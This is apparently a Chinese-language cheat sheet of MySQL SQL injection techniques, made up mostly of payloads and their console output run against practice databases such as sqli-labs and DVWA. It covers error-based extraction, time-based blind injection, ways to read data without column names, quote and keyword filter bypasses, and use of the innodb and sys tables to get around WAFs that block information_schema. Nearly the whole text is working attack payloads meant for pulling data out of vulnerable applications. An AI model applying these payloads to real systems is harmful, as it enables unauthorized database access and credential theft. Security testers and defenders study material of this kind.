mysql> select * from users where id>1 order by id limit 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1); ERROR 1105 (HY000): XPATH syntax error: ':5.5.53'
时间注入
1 2
select * from users where id>1 order by id limit 1,1 procedure analyse((select extractvalue (rand(),concat(0x3a,(IF(MID(version(),1,1) like 5,BENCHMARK(5000000,SHA1(1)),1))))),1);
在MySQL中,存在一个称为secure_file_priv的全局系统变量。 该变量用于限制数据的导入和导出操作,例如SELECT … INTO OUTFILE语句和LOAD_FILE() 如果secure_file_priv变量为空那么直接可以使用函数,如果为null是不能使用 但在mysql的5.5.53之前的版本是默认为空,之后的版本为null,所以是将这个功能禁掉了
1 2 3 4 5 6
mysql> show variables like "secure_file_priv"; +------------------+-------+ Variable_name Value +------------------+-------+ secure_file_priv NULL +------------------+-------+
floor报错 有研究人员发现,当在一个聚合函数,比如count函数后面如果使用分组语句就会把查询的一部分以错误的形式显示出来。 (没有floor和rand函数也是不会报错的) mysql> select count(*),concat(0x3a,database(),0x3a,floor(rand()*2))a from information_schema.tables group by a; ERROR 1062 (23000): Duplicate entry ':security:1' for key 'group_key'
Error based Double Query Injection mysql> select * from users where id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1; ERROR 1062 (23000): Duplicate entry '5.5.53~1' for key 'group_key'
当一个库中不存在的自定义函数他就会爆出当前库中没有此函数,从而爆出数据库名。 mysql> select username,phone from info where id=f(); ERROR 1305 (42000): FUNCTION security.f does not exist
Polygon,linestring爆表名,库名 mysql> select username,phone from info where id=1 and Polygon(id); ERROR 1367 (22007): Illegal non geometric '`security`.`info`.`id`' value found during parsing mysql> select username,phone from info where id=1 and linestring(id); ERROR 1367 (22007): Illegal non geometric '`security`.`info`.`id`' value found during parsing
exp() select * from users where id=1 and exp(~(select * from(select user())a));
mysql> select (select 1)a,(select 2)b,(select 3)c,(select 4)d; +---+---+---+---+ a b c d +---+---+---+---+ 1 2 3 4 +---+---+---+---+ 1 row in set (0.00 sec)
mysql> select * from (select 1)a,(select 2)b,(select 3)c,(select 4)d; +---+---+---+---+ 1 2 3 4 +---+---+---+---+ 1 2 3 4 +---+---+---+---+ 1 row in set (0.00 sec)
mysql> select * from (select 1)a,(select 2)b,(select 3)c union select * from users; +----+----------+------------+ 1 2 3 +----+----------+------------+ 1 2 3 1 Dumb Dumb 2 Angelina I-kill-you 3 Dummy p@ssword +----+----------+------------+ 4 rows in set (0.00 sec)
mysql> select e.3 from (select * from (select 1)a,(select 2)b,(select 3)c union select * from users)e; +------------+ 3 +------------+ 3 Dumb I-kill-you p@ssword +------------+ 4 rows in set (0.00 sec)
mysql> select e.3 from (select * from (select 1)a,(select 2)b,(select 3)c union select * from users)e limit 1 offset 3; +----------+ 3 +----------+ p@ssword +----------+ 1 row in set (0.00 sec)
mysql> select * from users where id=1 union select (select e.3 from (select * from (select 1)a,(select 2)b,(select 3)c union select * from users)e limit 1 offset 3)f,(select 1)g,(select 1)h; +----------+----------+----------+ id username password +----------+----------+----------+ 1 Dumb Dumb p@ssword 1 1 +----------+----------+----------+ 2 rows in set (0.00 sec)
如果不允许使用union
1 2 3 4 5 6 7 8 9 10 11 12
mysql> select * from users where id=1 and (select * from (select * from users as a join users as b) as c); ERROR 1060 (42S21): Duplicate column name 'id'
利用using爆其他字段 mysql> select * from users where id=1 and (select * from (select * from users as a join users as b using(id))as c); ERROR 1060 (42S21): Duplicate column name 'username'
mysql> select * from users where id=1 and (select * from (select * from users as a join users as b using(id,username))as c); ERROR 1060 (42S21): Duplicate column name 'password'
mysql> insert into user value(1,'admin','123'); Query OK, 1 row affected (0.00 sec)
mysql> insert into user value(2,'admin ','456'); Query OK, 1 row affected, 1 warning (0.00 sec)
mysql> select * from user; +----+------------+------+ id user pwd +----+------------+------+ 2 admin 456 1 admin 123 +----+------------+------+ 2 rows in set (0.00 sec)
mysql> select length(user) from user; +--------------+ length(user) +--------------+ 10 5 +--------------+ 2 rows in set (0.00 sec) 长度是不一样的,但是在受影响的版本中,id=2的user值admin 在前端登录处登录并且在后端验证中,admin 是等同id=1的user值admin的.
mysql> select * from users where id in (1,2); +----+----------+------------+ id username password +----+----------+------------+ 1 Dumb Dumb 2 Angelina I-kill-you +----+----------+------------+ 2 rows in set (0.00 sec)
mysql> select substr('abc',1,1) in ('z'); +----------------------------+ substr('abc',1,1) in ('z') +----------------------------+ 0 +----------------------------+ 1 row in set (0.00 sec)
mysql> select substr('abc',1,1) in ('a'); +----------------------------+ substr('abc',1,1) in ('a') +----------------------------+ 1 +----------------------------+ 1 row in set (0.00 sec)
mysql> select * from users where id between 1 and 3; +----+----------+------------+ id username password +----+----------+------------+ 1 Dumb Dumb 2 Angelina I-kill-you 3 Dummy p@ssword +----+----------+------------+ 3 rows in set (0.00 sec)
mysql> select * from users where username between 'sa' and 'sz'; +----+----------+-----------+ id username password +----+----------+-----------+ 4 secure crappy 5 stupid stupidity 6 superman genious +----+----------+-----------+ 3 rows in set (0.00 sec)
还支持16进制 mysql> select * from users where username between 0x7365 and 0x737a; +----+----------+-----------+ id username password +----+----------+-----------+ 4 secure crappy 5 stupid stupidity 6 superman genious +----+----------+-----------+ 3 rows in set (0.00 sec)
可以结合字符串截取进行盲注 mysql> select * from users where substr(username,1,1) between 'a' and 'd'; +----+----------+------------+ id username password +----+----------+------------+ 1 Dumb Dumb 2 Angelina I-kill-you 3 Dummy p@ssword 7 batman mob!le 8 admin admin +----+----------+------------+ 5 rows in set (0.00 sec)
mysql> select 1,2,3 union select * from users; +----+----------+------------+ 1 2 3 +----+----------+------------+ 1 2 3 1 Dumb Dumb 2 Angelina I-kill-you 3 Dummy p@ssword 4 secure crappy 5 stupid stupidity +----+----------+------------+ 6 rows in set (0.00 sec)
mysql> select passwd from (select 1,2,3 as passwd union select * from users)as twoname; +------------+ passwd +------------+ 3 Dumb I-kill-you p@ssword crappy stupidity +------------+ 6 rows in set (0.00 sec)
limit下的字段数判断
1 2 3 4
mysql> select * from users limit 1,1 into @,@; ERROR 1222 (21000): The used SELECT statements have a different number of columns mysql> select * from users limit 1,1 into @,@,@; Query OK, 1 row affected (0.00 sec)
or条件下前后如果都为真则返回所有结果,否则只返回条件为真的一方的值
BENCHMARK
BENCHMARK函数是指执行某函数的次数,次数多时能够达到与sleep函数相同的效果
1 2 3 4 5 6 7
mysql> select if(left(version(),1)=5,BENCHMARK(10000000,SHA('1')),1); +--------------------------------------------------------+ if(left(version(),1)=5,BENCHMARK(10000000,SHA('1')),1) +--------------------------------------------------------+ 0 +--------------------------------------------------------+ 1 row in set (3.60 sec)
绕过\‘过滤
1 2 3 4 5 6 7 8
hex编码 SELECT password FROM Users WHERE username = 0x61646D696E
char编码 SELECT FROM Users WHERE username = CHAR(97, 100, 109, 105, 110)
使用~ mysql> select * from user union select 1,2,~3,~4; +----+----------+----------------------------------+----------------------+ id username passwd role +----+----------+----------------------------------+----------------------+ 1 admin 9135967b6c6b40aa49f070360ea99b1f admin 1 2 18446744073709551612 18446744073709551611 +----+----------+----------------------------------+----------------------+ 2 rows in set (0.00 sec)
使用小数点(.) mysql> select * from user union select 1,2,.3,.4; +----+----------+----------------------------------+-------+ id username passwd role +----+----------+----------------------------------+-------+ 1 admin 9135967b6c6b40aa49f070360ea99b1f admin 1 2 0.3 0.4 +----+----------+----------------------------------+-------+ 2 rows in set (0.00 sec)
使用字符(*9e0) *9e0和前面的id=1′和起来,后台查询语句可能就变成了select * from user where id='1'*9e0;而在mysql中9e0表示9乘10的0次方,所以mysql会把上面字符串1强制转换成数值1再乘9,语句也就变成了select * from article where id='1′ mysql> select * from user where id='1' *9e0 union select 1,2,3,4; +----+----------+--------+------+ id username passwd role +----+----------+--------+------+ 1 2 3 4 +----+----------+--------+------+ 1 row in set (0.00 sec)
字符串前如from前加e0 mysql> select * from user where id=1 union select 1,2,3,4e0from user; +----+----------+----------------------------------+-------+ id username passwd role +----+----------+----------------------------------+-------+ 1 admin 9135967b6c6b40aa49f070360ea99b1f admin 1 2 3 4 +----+----------+----------------------------------+-------+ 2 rows in set (0.00 sec)
innodb
MySQL 5.7之后的版本,在其自带的 mysql 库中,新增了innodb_table_stats 和innodb_index_stats这两张日志表。如果数据表的引擎是innodb ,则会在这两张表中记录表、键的信息 。 如果waf掉了information我们可以利用这两个表注入数据库名和表名。
mysql> mysql> select * from mysql.innodb_index_stats; +---------------+---------------+------------+---------------------+--------------+------------+-------------+-----------------------------------+ database_name table_name index_name last_update stat_name stat_value sample_size stat_description +---------------+---------------+------------+---------------------+--------------+------------+-------------+-----------------------------------+ challenges ZGRW907ENU PRIMARY 2018-05-18 01:55:43 n_diff_pfx01 0 1 sessid challenges ZGRW907ENU PRIMARY 2018-05-18 01:55:43 n_leaf_pages 1 NULL Number of leaf pages in the index challenges ZGRW907ENU PRIMARY 2018-05-18 01:55:43 size 1 NULL Number of pages in the index dvwa guestbook PRIMARY 2018-04-21 23:00:47 n_diff_pfx01 0 1 comment_id dvwa guestbook PRIMARY 2018-04-21 23:00:47 n_leaf_pages 1 NULL Number of leaf pages in the index dvwa guestbook PRIMARY 2018-04-21 23:00:47 size 1 NULL Number of pages in the index dvwa users PRIMARY 2018-04-21 23:00:57 n_diff_pfx01 5 1 user_id dvwa users PRIMARY 2018-04-21 23:00:57 n_leaf_pages 1 NULL Number of leaf pages in the index dvwa users PRIMARY 2018-04-21 23:00:57 size 1 NULL Number of pages in the index mysql gtid_executed PRIMARY 2018-04-21 22:47:54 n_diff_pfx01 0 1 source_uuid mysql gtid_executed PRIMARY 2018-04-21 22:47:54 n_diff_pfx02 0 1 source_uuid,interval_start mysql gtid_executed PRIMARY 2018-04-21 22:47:54 n_leaf_pages 1 NULL Number of leaf pages in the index mysql gtid_executed PRIMARY 2018-04-21 22:47:54 size 1 NULL Number of pages in the index security emails PRIMARY 2018-05-18 01:55:43 n_diff_pfx01 8 1 id security emails PRIMARY 2018-05-18 01:55:43 n_leaf_pages 1 NULL Number of leaf pages in the index ...............
sys
MySQL 5.7版中,新加入了sys schema,里面整合了各种资料库资讯 其中对我们最有用的资讯大概就是statement_analysis表中的query,里面纪录着我们执行过的SQL语句(normalize过的)和一些数据。
mysql> select version(); +-----------+ version() +-----------+ 8.0.13 +-----------+ 1 row in set (0.00 sec)
mysql> show databases; +--------------------+ Database +--------------------+ information_schema mysql performance_schema sys +--------------------+ 4 rows in set (0.00 sec)
mysql> SELECT 18446744073709551610 * 2; ERROR 1690 (22003): BIGINT UNSIGNED value is out of range in '(18446744073709551610 * 2)' mysql> SELECT 18446744073709551610 * 1; +--------------------------+ 18446744073709551610 * 1 +--------------------------+ 18446744073709551610 +--------------------------+ 1 row in set (0.00 sec)
mysql> SELECT pow(9999,100); ERROR 1690 (22003): DOUBLE value is out of range in 'pow(9999,100)' mysql> SELECT pow(9999,1); +-------------+ pow(9999,1) +-------------+ 9999 +-------------+ 1 row in set (0.00 sec)
1 2 3 4 5 6 7 8 9
mysql> SELECT exp((select 1)*18446744073709551615); ERROR 1690 (22003): DOUBLE value is out of range in 'exp((1 * 18446744073709551615))' mysql> SELECT exp((select 0)*18446744073709551615); +--------------------------------------+ exp((select 0)*18446744073709551615) +--------------------------------------+ 1 +--------------------------------------+ 1 row in set (0.00 sec)
mysql> select user(); +----------------+ user() +----------------+ root@localhost +----------------+ 1 row in set (0.00 sec)
mysql> select mid(user() from -1); +---------------------+ mid(user() from -1) +---------------------+ t +---------------------+ 1 row in set (0.00 sec)
mysql> select mid(user() from -2); +---------------------+ mid(user() from -2) +---------------------+ st +---------------------+ 1 row in set (0.00 sec)
1 2 3 4 5 6 7 8 9 10
mysql> select * from users union select * from (select 1)a join (select 2)b join (select 3)c; +----+----------+------------+ id username password +----+----------+------------+ 1 Dumb Dumb 2 Angelina I-kill-you 3 Dummy p@ssword 1 2 3 +----+----------+------------+ 4 rows in set (0.00 sec)
数字型过滤and or
1 2
mysql> select * from users where id=1/(select sleep(3)); Empty set, 17 warnings (51.06 sec)
mysql> select * from sys.x$schema_flattened_keys; +--------------+-----------------------+-----------------+------------+----------------+-----------------------------------+ table_schema table_name index_name non_unique subpart_exists index_columns +--------------+-----------------------+-----------------+------------+----------------+-----------------------------------+ security emails PRIMARY 0 0 id security referers PRIMARY 0 0 id security uagents PRIMARY 0 0 id security users PRIMARY 0 0 id +--------------+-----------------------+-----------------+------------+----------------+-----------------------------------+
或者
1
mysql> select * from sys.schema_table_statistics;
在没有列名的情况下检索数据
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
mysql> SELECT * FROM USERS WHERE ID =1; +----+----------+----------+ id username password +----+----------+----------+ 1 123 Dumb +----+----------+----------+ 1 row in set (0.00 sec) mysql> SELECT * FROM USERS WHERE ID = ((select 1,123,'Dumb') <= (select * from users limit 1)); +----+----------+----------+ id username password +----+----------+----------+ 1 123 Dumb +----+----------+----------+ 1 row in set (0.00 sec)
mysql> SELECT * FROM USERS WHERE ID = ((select 2,123,'Dumb') <= (select * from users limit 1)); Empty set (0.00 sec)